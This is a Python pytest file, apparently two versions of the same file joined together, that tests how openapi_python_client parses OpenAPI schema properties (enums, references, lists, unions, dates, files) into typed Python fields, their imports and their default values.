fake_reference = mocker.MagicMock(class_name="MyTestEnum", module_name="my_test_enum")
mocker.patch(f"{MODULE_NAME}.Reference.from_ref", return_value=fake_reference)
prefix = mocker.MagicMock()
from openapi_python_client.parser import properties
enum_property = properties.EnumProperty(name="test", required=True, default=None, values={}, title="a_title")
assert enum_property.get_imports(prefix=prefix) == {
f"from {prefix}.{fake_reference.module_name} import {fake_reference.class_name}"
}
enum_property.required = False
assert enum_property.get_imports(prefix=prefix) == {
f"from {prefix}.{fake_reference.module_name} import {fake_reference.class_name}",
"from typing import Optional",
}
properties._existing_enums = {}
def test_values_from_list(self):
from openapi_python_client.parser.properties import EnumProperty
data = ["abc", "123", "a23", "1bc"]
result = EnumProperty.values_from_list(data)
assert result == {
"ABC": "abc",
"VALUE_1": "123",
"A23": "a23",
"VALUE_3": "1bc",
}
def test_values_from_list_duplicate(self):
from openapi_python_client.parser.properties import EnumProperty
data = ["abc", "123", "a23", "abc"]
with pytest.raises(ValueError):
EnumProperty.values_from_list(data)
def test_get_all_enums(self, mocker):
from openapi_python_client.parser import properties
properties._existing_enums = mocker.MagicMock()
assert properties.EnumProperty.get_all_enums() == properties._existing_enums
properties._existing_enums = {}
def test_get_enum(self):
from openapi_python_client.parser import properties
properties._existing_enums = {"test": "an enum"}
assert properties.EnumProperty.get_enum("test") == "an enum"
properties._existing_enums = {}
class TestRefProperty:
def test_template(self, mocker):
from openapi_python_client.parser.properties import RefProperty
ref_property = RefProperty(
name="test", required=True, default=None, reference=mocker.MagicMock(class_name="MyRefClass")
)
assert ref_property.template == "ref_property.pyi"
mocker.patch(f"{MODULE_NAME}.EnumProperty.get_enum", return_value="an enum")
assert ref_property.template == "enum_property.pyi"
def test_get_type_string(self, mocker):
from openapi_python_client.parser.properties import RefProperty
ref_property = RefProperty(
name="test", required=True, default=None, reference=mocker.MagicMock(class_name="MyRefClass")
)
assert ref_property.get_type_string() == "MyRefClass"
ref_property.required = False
assert ref_property.get_type_string() == "Optional[MyRefClass]"
def test_get_imports(self, mocker):
fake_reference = mocker.MagicMock(class_name="MyRefClass", module_name="my_test_enum")
prefix = mocker.MagicMock()
from openapi_python_client.parser.properties import RefProperty
p = RefProperty(name="test", required=True, default=None, reference=fake_reference)
assert p.get_imports(prefix=prefix) == {
f"from {prefix}.{fake_reference.module_name} import {fake_reference.class_name}",
"from typing import Dict",
"from typing import cast",
}
p.required = False
assert p.get_imports(prefix=prefix) == {
f"from {prefix}.{fake_reference.module_name} import {fake_reference.class_name}",
"from typing import Dict",
"from typing import cast",
"from typing import Optional",
}
class TestDictProperty:
def test___post_init__(self):
from openapi_python_client.parser.properties import DictProperty
p = DictProperty(name="blah", required=True, default={})
assert p.default == "field(default_factory=lambda: cast(Dict[Any, Any], {}))"
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import DictProperty
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
prefix = mocker.MagicMock()
p = DictProperty(name=name, required=True, default=None)
assert p.get_imports(prefix=prefix) == {
"from typing import Dict",
}
p.required = False
assert p.get_imports(prefix=prefix) == {
"from typing import Optional",
"from typing import Dict",
}
p.default = mocker.MagicMock()
assert p.get_imports(prefix=prefix) == {
"from typing import Optional",
"from typing import Dict",
"from typing import cast",
"from dataclasses import field",
}
class TestPropertyFromData:
def test_property_from_data_enum(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = mocker.MagicMock(title=None)
EnumProperty = mocker.patch(f"{MODULE_NAME}.EnumProperty")
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
EnumProperty.values_from_list.assert_called_once_with(data.enum)
EnumProperty.assert_called_once_with(
name=name, required=required, values=EnumProperty.values_from_list(), default=data.default, title=name
)
assert p == EnumProperty()
EnumProperty.reset_mock()
data.title = mocker.MagicMock()
property_from_data(
name=name, required=required, data=data,
)
EnumProperty.assert_called_once_with(
name=name, required=required, values=EnumProperty.values_from_list(), default=data.default, title=data.title
)
def test_property_from_data_ref(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Reference.construct(ref=mocker.MagicMock())
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
RefProperty = mocker.patch(f"{MODULE_NAME}.RefProperty")
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
from_ref.assert_called_once_with(data.ref)
RefProperty.assert_called_once_with(name=name, required=required, reference=from_ref(), default=None)
assert p == RefProperty()
def test_property_from_data_string(self, mocker):
_string_based_property = mocker.patch(f"{MODULE_NAME}._string_based_property")
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string")
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
assert p == _string_based_property.return_value
_string_based_property.assert_called_once_with(name=name, required=required, data=data)
@pytest.mark.parametrize(
"openapi_type,python_type",
[
("number", "FloatProperty"),
("integer", "IntProperty"),
("boolean", "BooleanProperty"),
("object", "DictProperty"),
],
)
def test_property_from_data_simple_types(self, mocker, openapi_type, python_type):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type=openapi_type)
clazz = mocker.patch(f"{MODULE_NAME}.{python_type}")
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
clazz.assert_called_once_with(name=name, required=required, default=None)
assert p == clazz()
# Test optional values
clazz.reset_mock()
data.default = mocker.MagicMock()
property_from_data(
name=name, required=required, data=data,
)
clazz.assert_called_once_with(name=name, required=required, default=data.default)
def test_property_from_data_array(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(type="array", items={"type": "number", "default": "0.0"},)
ListProperty = mocker.patch(f"{MODULE_NAME}.ListProperty")
FloatProperty = mocker.patch(f"{MODULE_NAME}.FloatProperty")
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
FloatProperty.assert_called_once_with(name=f"{name}_item", required=True, default="0.0")
ListProperty.assert_called_once_with(
name=name, required=required, default=None, inner_property=FloatProperty.return_value
)
assert p == ListProperty.return_value
def test_property_from_data_array_no_items(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(type="array")
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
assert p == PropertyError(data=data, detail="type array must have items defined")
def test_property_from_data_array_invalid_items(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(type="array", items={},)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
assert p == PropertyError(data=oai.Schema(), detail=f"invalid data in items of array {name}")
def test_property_from_data_union(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(anyOf=[{"type": "number", "default": "0.0"}, {"type": "integer", "default": "0"},])
UnionProperty = mocker.patch(f"{MODULE_NAME}.UnionProperty")
FloatProperty = mocker.patch(f"{MODULE_NAME}.FloatProperty")
IntProperty = mocker.patch(f"{MODULE_NAME}.IntProperty")
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
FloatProperty.assert_called_once_with(name=name, required=required, default="0.0")
IntProperty.assert_called_once_with(name=name, required=required, default="0")
UnionProperty.assert_called_once_with(
name=name,
required=required,
default=None,
inner_properties=[FloatProperty.return_value, IntProperty.return_value],
)
assert p == UnionProperty.return_value
def test_property_from_data_union_bad_type(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(anyOf=[{}])
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
assert p == PropertyError(detail=f"Invalid property in union {name}", data=oai.Schema())
def test_property_from_data_unsupported_type(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type=mocker.MagicMock())
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import property_from_data
assert property_from_data(name=name, required=required, data=data) == PropertyError(
data=data, detail=f"unknown type {data.type}"
)
def test_property_from_data_no_valid_props_in_data(self):
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import property_from_data
data = oai.Schema()
assert property_from_data(name="blah", required=True, data=data) == PropertyError(
data=data, detail="Schemas must either have one of enum, anyOf, or type defined."
)
class TestStringBasedProperty:
def test__string_based_property_no_format(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string")
StringProperty = mocker.patch(f"{MODULE_NAME}.StringProperty")
from openapi_python_client.parser.properties import _string_based_property
p = _string_based_property(name=name, required=required, data=data)
StringProperty.assert_called_once_with(name=name, required=required, pattern=None, default=None)
assert p == StringProperty.return_value
# Test optional values
StringProperty.reset_mock()
data.default = mocker.MagicMock()
data.pattern = mocker.MagicMock()
_string_based_property(
name=name, required=required, data=data,
)
StringProperty.assert_called_once_with(name=name, required=required, pattern=data.pattern, default=data.default)
def test__string_based_property_datetime_format(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string", schema_format="date-time")
DateTimeProperty = mocker.patch(f"{MODULE_NAME}.DateTimeProperty")
from openapi_python_client.parser.properties import _string_based_property
p = _string_based_property(name=name, required=required, data=data)
DateTimeProperty.assert_called_once_with(name=name, required=required, default=None)
assert p == DateTimeProperty.return_value
# Test optional values
DateTimeProperty.reset_mock()
data.default = mocker.MagicMock()
_string_based_property(
name=name, required=required, data=data,
)
DateTimeProperty.assert_called_once_with(name=name, required=required, default=data.default)
def test__string_based_property_date_format(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string", schema_format="date")
DateProperty = mocker.patch(f"{MODULE_NAME}.DateProperty")
from openapi_python_client.parser.properties import _string_based_property
p = _string_based_property(name=name, required=required, data=data)
DateProperty.assert_called_once_with(name=name, required=required, default=None)
assert p == DateProperty.return_value
# Test optional values
DateProperty.reset_mock()
data.default = mocker.MagicMock()
_string_based_property(
name=name, required=required, data=data,
)
DateProperty.assert_called_once_with(name=name, required=required, default=data.default)
def test__string_based_property_binary_format(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string", schema_format="binary")
FileProperty = mocker.patch(f"{MODULE_NAME}.FileProperty")
from openapi_python_client.parser.properties import _string_based_property
p = _string_based_property(name=name, required=required, data=data)
FileProperty.assert_called_once_with(name=name, required=required, default=None)
assert p == FileProperty.return_value
# Test optional values
FileProperty.reset_mock()
data.default = mocker.MagicMock()
_string_based_property(
name=name, required=required, data=data,
)
FileProperty.assert_called_once_with(name=name, required=required, default=data.default)
def test__string_based_property_unsupported_format(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string", schema_format=mocker.MagicMock())
StringProperty = mocker.patch(f"{MODULE_NAME}.StringProperty")
from openapi_python_client.parser.properties import _string_based_property
p = _string_based_property(name=name, required=required, data=data)
StringProperty.assert_called_once_with(name=name, required=required, pattern=None, default=None)
assert p == StringProperty.return_value
# Test optional values
StringProperty.reset_mock()
data.default = mocker.MagicMock()
data.pattern = mocker.MagicMock()
_string_based_property(
name=name, required=required, data=data,
)
StringProperty.assert_called_once_with(name=name, required=required, pattern=data.pattern, default=data.default)
| from datetime import date, datetime
import pytest
import openapi_python_client.schema as oai
from openapi_python_client.parser.errors import PropertyError, ValidationError
from openapi_python_client.parser.reference import Reference
MODULE_NAME = "openapi_python_client.parser.properties"
class TestProperty:
def test___post_init(self, mocker):
from openapi_python_client.parser.properties import Property
validate_default = mocker.patch(f"{MODULE_NAME}.Property._validate_default")
Property(name="a name", required=True, default=None)
validate_default.assert_not_called()
Property(name="a name", required=True, default="the default value")
validate_default.assert_called_with(default="the default value")
def test_get_type_string(self):
from openapi_python_client.parser.properties import Property
p = Property(name="test", required=True, default=None)
p._type_string = "TestType"
assert p.get_type_string() == "TestType"
p.required = False
assert p.get_type_string() == "Optional[TestType]"
def test_to_string(self, mocker):
from openapi_python_client.parser.properties import Property
name = mocker.MagicMock()
snake_case = mocker.patch("openapi_python_client.utils.snake_case")
p = Property(name=name, required=True, default=None)
get_type_string = mocker.patch.object(p, "get_type_string")
assert p.to_string() == f"{snake_case(name)}: {get_type_string()}"
p.required = False
assert p.to_string() == f"{snake_case(name)}: {get_type_string()} = None"
p.default = "TEST"
assert p.to_string() == f"{snake_case(name)}: {get_type_string()} = TEST"
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import Property
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
p = Property(name=name, required=True, default=None)
assert p.get_imports(prefix="") == set()
p.required = False
assert p.get_imports(prefix="") == {"from typing import Optional"}
def test__validate_default(self):
from openapi_python_client.parser.properties import Property
# should be okay if default isn't specified
p = Property(name="a name", required=True, default=None)
with pytest.raises(ValidationError):
p._validate_default("a default value")
with pytest.raises(ValidationError):
p = Property(name="a name", required=True, default="")
class TestStringProperty:
def test_get_type_string(self):
from openapi_python_client.parser.properties import StringProperty
p = StringProperty(name="test", required=True, default=None)
assert p.get_type_string() == "str"
p.required = False
assert p.get_type_string() == "Optional[str]"
def test__validate_default(self):
from openapi_python_client.parser.properties import StringProperty
p = StringProperty(name="a name", required=True, default="the default value")
assert p.default == '"the default value"'
class TestDateTimeProperty:
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import DateTimeProperty
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
p = DateTimeProperty(name=name, required=True, default=None)
assert p.get_imports(prefix="") == {
"import datetime",
"from typing import cast",
}
p.required = False
assert p.get_imports(prefix="") == {
"from typing import Optional",
"import datetime",
"from typing import cast",
}
def test__validate_default(self):
from openapi_python_client.parser.properties import DateTimeProperty
with pytest.raises(ValidationError):
p = DateTimeProperty(name="a name", required=True, default="not a datetime")
p = DateTimeProperty(name="a name", required=True, default="2017-07-21T17:32:28Z")
assert p.default == "datetime.datetime(2017, 7, 21, 17, 32, 28, tzinfo=datetime.timezone.utc)"
class TestDateProperty:
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import DateProperty
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
p = DateProperty(name=name, required=True, default=None)
assert p.get_imports(prefix="") == {
"import datetime",
"from typing import cast",
}
p.required = False
assert p.get_imports(prefix="") == {
"from typing import Optional",
"import datetime",
"from typing import cast",
}
def test__validate_default(self):
from openapi_python_client.parser.properties import DateProperty
with pytest.raises(ValidationError):
p = DateProperty(name="a name", required=True, default="not a date")
p = DateProperty(name="a name", required=True, default="1010-10-10")
assert p.default == "datetime.date(1010, 10, 10)"
class TestFileProperty:
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import FileProperty
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
prefix = "blah"
p = FileProperty(name=name, required=True, default=None)
assert p.get_imports(prefix=prefix) == {f"from {prefix}.types import File", "from dataclasses import astuple"}
p.required = False
assert p.get_imports(prefix=prefix) == {
"from typing import Optional",
f"from {prefix}.types import File",
"from dataclasses import astuple",
}
def test__validate_default(self):
from openapi_python_client.parser.properties import FileProperty
# should be okay if default isn't specified
p = FileProperty(name="a name", required=True, default=None)
with pytest.raises(ValidationError):
p = FileProperty(name="a name", required=True, default="")
class TestFloatProperty:
def test__validate_default(self):
from openapi_python_client.parser.properties import FloatProperty
# should be okay if default isn't specified
p = FloatProperty(name="a name", required=True, default=None)
p = FloatProperty(name="a name", required=True, default="123.123")
assert p.default == 123.123
with pytest.raises(ValidationError):
p = FloatProperty(name="a name", required=True, default="not a float")
class TestIntProperty:
def test__validate_default(self):
from openapi_python_client.parser.properties import IntProperty
# should be okay if default isn't specified
p = IntProperty(name="a name", required=True, default=None)
p = IntProperty(name="a name", required=True, default="123")
assert p.default == 123
with pytest.raises(ValidationError):
p = IntProperty(name="a name", required=True, default="not an int")
class TestBooleanProperty:
def test__validate_default(self):
from openapi_python_client.parser.properties import BooleanProperty
# should be okay if default isn't specified
p = BooleanProperty(name="a name", required=True, default=None)
p = BooleanProperty(name="a name", required=True, default="Literally anything will work")
assert p.default == True
class TestListProperty:
def test_get_type_string(self, mocker):
from openapi_python_client.parser.properties import ListProperty
inner_property = mocker.MagicMock()
inner_type_string = mocker.MagicMock()
inner_property.get_type_string.return_value = inner_type_string
p = ListProperty(name="test", required=True, default=None, inner_property=inner_property)
assert p.get_type_string() == f"List[{inner_type_string}]"
p.required = False
assert p.get_type_string() == f"Optional[List[{inner_type_string}]]"
p = ListProperty(name="test", required=True, default=[], inner_property=inner_property)
assert p.default == f"field(default_factory=lambda: cast(List[{inner_type_string}], []))"
def test_get_type_imports(self, mocker):
from openapi_python_client.parser.properties import ListProperty
inner_property = mocker.MagicMock()
inner_import = mocker.MagicMock()
inner_property.get_imports.return_value = {inner_import}
prefix = mocker.MagicMock()
p = ListProperty(name="test", required=True, default=None, inner_property=inner_property)
assert p.get_imports(prefix=prefix) == {
inner_import,
"from typing import List",
}
p.required = False
assert p.get_imports(prefix=prefix) == {
inner_import,
"from typing import List",
"from typing import Optional",
}
p.default = mocker.MagicMock()
assert p.get_imports(prefix=prefix) == {
inner_import,
"from typing import Optional",
"from typing import List",
"from typing import cast",
"from dataclasses import field",
}
def test__validate_default(self, mocker):
from openapi_python_client.parser.properties import ListProperty
inner_property = mocker.MagicMock()
inner_type_string = mocker.MagicMock()
inner_property.get_type_string.return_value = inner_type_string
inner_property._validate_default.return_value = "y"
p = ListProperty(name="a name", required=True, default=["x"], inner_property=inner_property)
assert p.default == f"field(default_factory=lambda: cast(List[{inner_type_string}], ['y']))"
with pytest.raises(ValidationError):
p = ListProperty(name="a name", required=True, default="x", inner_property=inner_property)
def test__validate_default_enum_items(self, mocker):
from openapi_python_client.parser.properties import ListProperty, RefProperty
inner_enum_property = mocker.MagicMock(spec=RefProperty)
inner_enum_property.get_type_string.return_value = "AnEnum"
inner_enum_property._validate_default.return_value = "AnEnum.val1"
p = ListProperty(name="a name", required=True, default=["val1"], inner_property=inner_enum_property)
assert p.default == f"field(default_factory=lambda: cast(List[AnEnum], [AnEnum.val1]))"
class TestUnionProperty:
def test_get_type_string(self, mocker):
from openapi_python_client.parser.properties import UnionProperty
inner_property_1 = mocker.MagicMock()
inner_property_1.get_type_string.return_value = "inner_type_string_1"
inner_property_2 = mocker.MagicMock()
inner_property_2.get_type_string.return_value = "inner_type_string_2"
p = UnionProperty(
name="test", required=True, default=None, inner_properties=[inner_property_1, inner_property_2]
)
assert p.get_type_string() == "Union[inner_type_string_1, inner_type_string_2]"
p.required = False
assert p.get_type_string() == "Optional[Union[inner_type_string_1, inner_type_string_2]]"
def test_get_type_imports(self, mocker):
from openapi_python_client.parser.properties import UnionProperty
inner_property_1 = mocker.MagicMock()
inner_import_1 = mocker.MagicMock()
inner_property_1.get_imports.return_value = {inner_import_1}
inner_property_2 = mocker.MagicMock()
inner_import_2 = mocker.MagicMock()
inner_property_2.get_imports.return_value = {inner_import_2}
prefix = mocker.MagicMock()
p = UnionProperty(
name="test", required=True, default=None, inner_properties=[inner_property_1, inner_property_2]
)
assert p.get_imports(prefix=prefix) == {
inner_import_1,
inner_import_2,
"from typing import Union",
}
p.required = False
assert p.get_imports(prefix=prefix) == {
inner_import_1,
inner_import_2,
"from typing import Union",
"from typing import Optional",
}
def test__validate_default(self, mocker):
from openapi_python_client.parser.properties import UnionProperty
inner_property_1 = mocker.MagicMock()
inner_property_1.get_type_string.return_value = "inner_type_string_1"
inner_property_1._validate_default.side_effect = ValidationError()
inner_property_2 = mocker.MagicMock()
inner_property_2.get_type_string.return_value = "inner_type_string_2"
inner_property_2._validate_default.return_value = "the default value"
p = UnionProperty(
name="test", required=True, default="a value", inner_properties=[inner_property_1, inner_property_2]
)
assert p.default == "the default value"
inner_property_2._validate_default.side_effect = ValidationError()
with pytest.raises(ValidationError):
p = UnionProperty(
name="test", required=True, default="a value", inner_properties=[inner_property_1, inner_property_2]
)
class TestEnumProperty:
def test___post_init__(self, mocker):
name = mocker.MagicMock()
snake_case = mocker.patch("openapi_python_client.utils.snake_case")
fake_reference = mocker.MagicMock(class_name="MyTestEnum")
deduped_reference = mocker.MagicMock(class_name="Deduped")
from_ref = mocker.patch(
f"{MODULE_NAME}.Reference.from_ref", side_effect=[fake_reference, deduped_reference, deduped_reference]
)
from openapi_python_client.parser import properties
fake_dup_enum = mocker.MagicMock()
properties._existing_enums = {"MyTestEnum": fake_dup_enum}
values = {"FIRST": "first", "SECOND": "second"}
enum_property = properties.EnumProperty(
name=name, required=True, default="second", values=values, title="a_title",
)
assert enum_property.default == "Deduped.SECOND"
assert enum_property.python_name == snake_case(name)
from_ref.assert_has_calls([mocker.call("a_title"), mocker.call("MyTestEnum1")])
assert enum_property.reference == deduped_reference
assert properties._existing_enums == {"MyTestEnum": fake_dup_enum, "Deduped": enum_property}
# Test encountering exactly the same Enum again
assert (
properties.EnumProperty(name=name, required=True, default="second", values=values, title="a_title",)
== enum_property
)
assert properties._existing_enums == {"MyTestEnum": fake_dup_enum, "Deduped": enum_property}
# What if an Enum exists with the same name, but has the same values? Don't dedupe that.
fake_dup_enum.values = values
from_ref.reset_mock()
from_ref.side_effect = [fake_reference]
enum_property = properties.EnumProperty(
name=name, required=True, default="second", values=values, title="a_title",
)
assert enum_property.default == "MyTestEnum.SECOND"
assert enum_property.python_name == snake_case(name)
from_ref.assert_called_once_with("a_title")
assert enum_property.reference == fake_reference
assert len(properties._existing_enums) == 2
properties._existing_enums = {}
def test_get_type_string(self, mocker):
fake_reference = mocker.MagicMock(class_name="MyTestEnum")
mocker.patch(f"{MODULE_NAME}.Reference.from_ref", return_value=fake_reference)
from openapi_python_client.parser import properties
enum_property = properties.EnumProperty(name="test", required=True, default=None, values={}, title="a_title")
assert enum_property.get_type_string() == "MyTestEnum"
enum_property.required = False
assert enum_property.get_type_string() == "Optional[MyTestEnum]"
properties._existing_enums = {}
def test_get_imports(self, mocker):
fake_reference = mocker.MagicMock(class_name="MyTestEnum", module_name="my_test_enum")
mocker.patch(f"{MODULE_NAME}.Reference.from_ref", return_value=fake_reference)
prefix = mocker.MagicMock()
from openapi_python_client.parser import properties
enum_property = properties.EnumProperty(name="test", required=True, default=None, values={}, title="a_title")
assert enum_property.get_imports(prefix=prefix) == {
f"from {prefix}.{fake_reference.module_name} import {fake_reference.class_name}"
}
enum_property.required = False
assert enum_property.get_imports(prefix=prefix) == {
f"from {prefix}.{fake_reference.module_name} import {fake_reference.class_name}",
"from typing import Optional",
}
properties._existing_enums = {}
def test_values_from_list(self):
from openapi_python_client.parser.properties import EnumProperty
data = ["abc", "123", "a23", "1bc"]
result = EnumProperty.values_from_list(data)
assert result == {
"ABC": "abc",
"VALUE_1": "123",
"A23": "a23",
"VALUE_3": "1bc",
}
def test_values_from_list_duplicate(self):
from openapi_python_client.parser.properties import EnumProperty
data = ["abc", "123", "a23", "abc"]
with pytest.raises(ValueError):
EnumProperty.values_from_list(data)
def test_get_all_enums(self, mocker):
from openapi_python_client.parser import properties
properties._existing_enums = mocker.MagicMock()
assert properties.EnumProperty.get_all_enums() == properties._existing_enums
properties._existing_enums = {}
def test_get_enum(self):
from openapi_python_client.parser import properties
properties._existing_enums = {"test": "an enum"}
assert properties.EnumProperty.get_enum("test") == "an enum"
properties._existing_enums = {}
def test__validate_default(self, mocker):
fake_reference = mocker.MagicMock(class_name="MyTestEnum", module_name="my_test_enum")
mocker.patch(f"{MODULE_NAME}.Reference.from_ref", return_value=fake_reference)
from openapi_python_client.parser import properties
enum_property = properties.EnumProperty(
name="test", required=True, default="test", values={"TEST": "test"}, title="a_title"
)
assert enum_property.default == "MyTestEnum.TEST"
with pytest.raises(ValidationError):
enum_property = properties.EnumProperty(
name="test", required=True, default="bad_val", values={"TEST": "test"}, title="a_title"
)
properties._existing_enums = {}
class TestRefProperty:
def test_template(self, mocker):
from openapi_python_client.parser.properties import RefProperty
ref_property = RefProperty(
name="test", required=True, default=None, reference=mocker.MagicMock(class_name="MyRefClass")
)
assert ref_property.template == "ref_property.pyi"
mocker.patch(f"{MODULE_NAME}.EnumProperty.get_enum", return_value="an enum")
assert ref_property.template == "enum_property.pyi"
def test_get_type_string(self, mocker):
from openapi_python_client.parser.properties import RefProperty
ref_property = RefProperty(
name="test", required=True, default=None, reference=mocker.MagicMock(class_name="MyRefClass")
)
assert ref_property.get_type_string() == "MyRefClass"
ref_property.required = False
assert ref_property.get_type_string() == "Optional[MyRefClass]"
def test_get_imports(self, mocker):
fake_reference = mocker.MagicMock(class_name="MyRefClass", module_name="my_test_enum")
prefix = mocker.MagicMock()
from openapi_python_client.parser.properties import RefProperty
p = RefProperty(name="test", required=True, default=None, reference=fake_reference)
assert p.get_imports(prefix=prefix) == {
f"from {prefix}.{fake_reference.module_name} import {fake_reference.class_name}",
"from typing import Dict",
"from typing import cast",
}
p.required = False
assert p.get_imports(prefix=prefix) == {
f"from {prefix}.{fake_reference.module_name} import {fake_reference.class_name}",
"from typing import Dict",
"from typing import cast",
"from typing import Optional",
}
def test__validate_default(self, mocker):
from openapi_python_client.parser.properties import RefProperty
with pytest.raises(ValidationError):
p = RefProperty(name="a name", required=True, default="", reference=mocker.MagicMock())
enum_property = mocker.MagicMock()
enum_property._validate_default.return_value = "val1"
mocker.patch(f"{MODULE_NAME}.EnumProperty.get_enum", return_value=enum_property)
p = RefProperty(name="a name", required=True, default="", reference=mocker.MagicMock())
assert p.default == "val1"
class TestDictProperty:
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import DictProperty
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
prefix = mocker.MagicMock()
p = DictProperty(name=name, required=True, default=None)
assert p.get_imports(prefix=prefix) == {
"from typing import Dict",
}
p.required = False
assert p.get_imports(prefix=prefix) == {
"from typing import Optional",
"from typing import Dict",
}
p.default = mocker.MagicMock()
assert p.get_imports(prefix=prefix) == {
"from typing import Optional",
"from typing import Dict",
"from typing import cast",
"from dataclasses import field",
}
def test__validate_default(self):
from openapi_python_client.parser.properties import DictProperty
p = DictProperty(name="a name", required=True, default={"key": "value"})
with pytest.raises(ValidationError):
p = DictProperty(name="a name", required=True, default="not a dict")
class TestPropertyFromData:
def test_property_from_data_enum(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = mocker.MagicMock(title=None)
EnumProperty = mocker.patch(f"{MODULE_NAME}.EnumProperty")
mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=name)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
EnumProperty.values_from_list.assert_called_once_with(data.enum)
EnumProperty.assert_called_once_with(
name=name, required=required, values=EnumProperty.values_from_list(), default=data.default, title=name
)
assert p == EnumProperty()
EnumProperty.reset_mock()
data.title = mocker.MagicMock()
property_from_data(
name=name, required=required, data=data,
)
EnumProperty.assert_called_once_with(
name=name, required=required, values=EnumProperty.values_from_list(), default=data.default, title=data.title
)
def test_property_from_data_ref(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Reference.construct(ref=mocker.MagicMock())
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
RefProperty = mocker.patch(f"{MODULE_NAME}.RefProperty")
mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=name)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
from_ref.assert_called_once_with(data.ref)
RefProperty.assert_called_once_with(name=name, required=required, reference=from_ref(), default=None)
assert p == RefProperty()
def test_property_from_data_string(self, mocker):
_string_based_property = mocker.patch(f"{MODULE_NAME}._string_based_property")
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string")
mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=name)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
assert p == _string_based_property.return_value
_string_based_property.assert_called_once_with(name=name, required=required, data=data)
@pytest.mark.parametrize(
"openapi_type,python_type",
[
("number", "FloatProperty"),
("integer", "IntProperty"),
("boolean", "BooleanProperty"),
("object", "DictProperty"),
],
)
def test_property_from_data_simple_types(self, mocker, openapi_type, python_type):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type=openapi_type)
clazz = mocker.patch(f"{MODULE_NAME}.{python_type}")
mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=name)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
clazz.assert_called_once_with(name=name, required=required, default=None)
assert p == clazz()
# Test optional values
clazz.reset_mock()
data.default = mocker.MagicMock()
property_from_data(
name=name, required=required, data=data,
)
clazz.assert_called_once_with(name=name, required=required, default=data.default)
def test_property_from_data_array(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(type="array", items={"type": "number", "default": "0.0"},)
ListProperty = mocker.patch(f"{MODULE_NAME}.ListProperty")
FloatProperty = mocker.patch(f"{MODULE_NAME}.FloatProperty")
mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=name)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
FloatProperty.assert_called_once_with(name=name, required=True, default="0.0")
ListProperty.assert_called_once_with(
name=name, required=required, default=None, inner_property=FloatProperty.return_value
)
assert p == ListProperty.return_value
def test_property_from_data_array_no_items(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(type="array")
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
assert p == PropertyError(data=data, detail="type array must have items defined")
def test_property_from_data_array_invalid_items(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(type="array", items={},)
